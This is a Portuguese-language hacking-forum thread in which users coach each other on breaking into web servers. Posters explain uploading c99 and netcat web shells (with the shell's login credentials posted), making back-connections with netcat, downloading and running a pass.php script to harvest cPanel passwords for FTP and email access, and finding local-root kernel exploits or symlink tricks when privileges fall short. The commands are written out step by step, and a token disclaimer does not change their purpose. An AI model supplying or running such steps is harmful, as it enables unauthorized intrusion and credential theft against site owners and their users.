Faz o back-connect e tenta fazer assim:

wget -O pass.php Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

chmod 755 pass.php

php pass.php



Ai você vai conseguir as senhas do cpanel, se você conseguir as senhas do cpanel você tem acesso a digamos, TUDO, ftp, senha dos e-mails, sub-domínios.

Att. Cr4t3r

Dependendo do servidor da para ler apenas textos sabendo o diretório correto, todas imagens e arquivos que foram indexados nos e-mails vc pode obter o código deles mas não consegue reconstrui-los novamente (eu pelomenos nunca consegui) mas caso vc consiga o que o Cr4t3r lhe recomendou é muito melhor.

galera até hoje nao conseui upar uma shell c99 .Aalguem poderia explicar melhor

galera euaindanao consegui upar uma shell c99 alguem pode me explicar melhor ?

O que posso tá errando no back connect , fui na parte bind da shell c99 cliquei em connect me deu a seguinte mensagem :
Result of back connection:
Now script try connect to MEU_IP:11457...

dei o comando nc -vv IP_SITE 11457

mas ele nao responde fica um tempo e da Connection Time Out

Faz com netcat shell então no próprio browser.

Como assim pelo browser , poderia detalhar mais não entendi muito bem , faltei nessa aula hahahaha

Download da Netcat Shell - (Não fui eu que criei e nem que encodei)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Senha para logar nela:

login: root
senha: cr4ckers.com

Sobe ela para o site e loga com as senhas acima na shell, após isso sobe o arquivo pass.php (que o Cr4t3r postou) para o site e após isso siga os comandos dê permissão:

chmod 755 pass.php

Após isso:

php pass.php

-----------------------------------------------
Aqui caso vc ache o diretório (e tiver permissões) como eu tinha postado acima vc vai conseguir ler desta maneira abaixo, o lado bom é que não precisa de cpanel e nem ser root, o lado ruim é que não consegue reconstruir os arquivos que forem enviados.

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


Veja bem isso é apenas uma demonstração eu espero que vc não prejudique ninguém (pelomenos não é essa minha intenção em estar ajudando).

Olha a mesagem que deu .. pela shell da c99 eu conseguia chegar até chegar aqui , a mensagem diz que eu tenho que logar como administrador isso eu nao entendi muito bem , se eu estou com a shell upadada eu não tenho acesso total ??

Não.

Vc precisa ver a versão do Kernel e procurar um exploit pra local root da versão dele ou qualquer outro que vc consiga root na versão especifica do kernel.

Tava bem claro no código que o Cr4t3r passou que precisava ser root.

Me retornou essa linha Linux 3.10.17-king-centos5 #1 SMP Thu Oct 24 13:18:24 BRST 2013 x86_64 , procurei por " Linux 3.10.17-king-centos5 " não achei nada

Procura em sites especificos para isso como Exploit-db, Security Focus, 1337 e vários outros.

Tenta com Symlink que não precisa de root, porém se não conseguir com Symlink a única opção dai é ser root pra conseguir o que vc quer.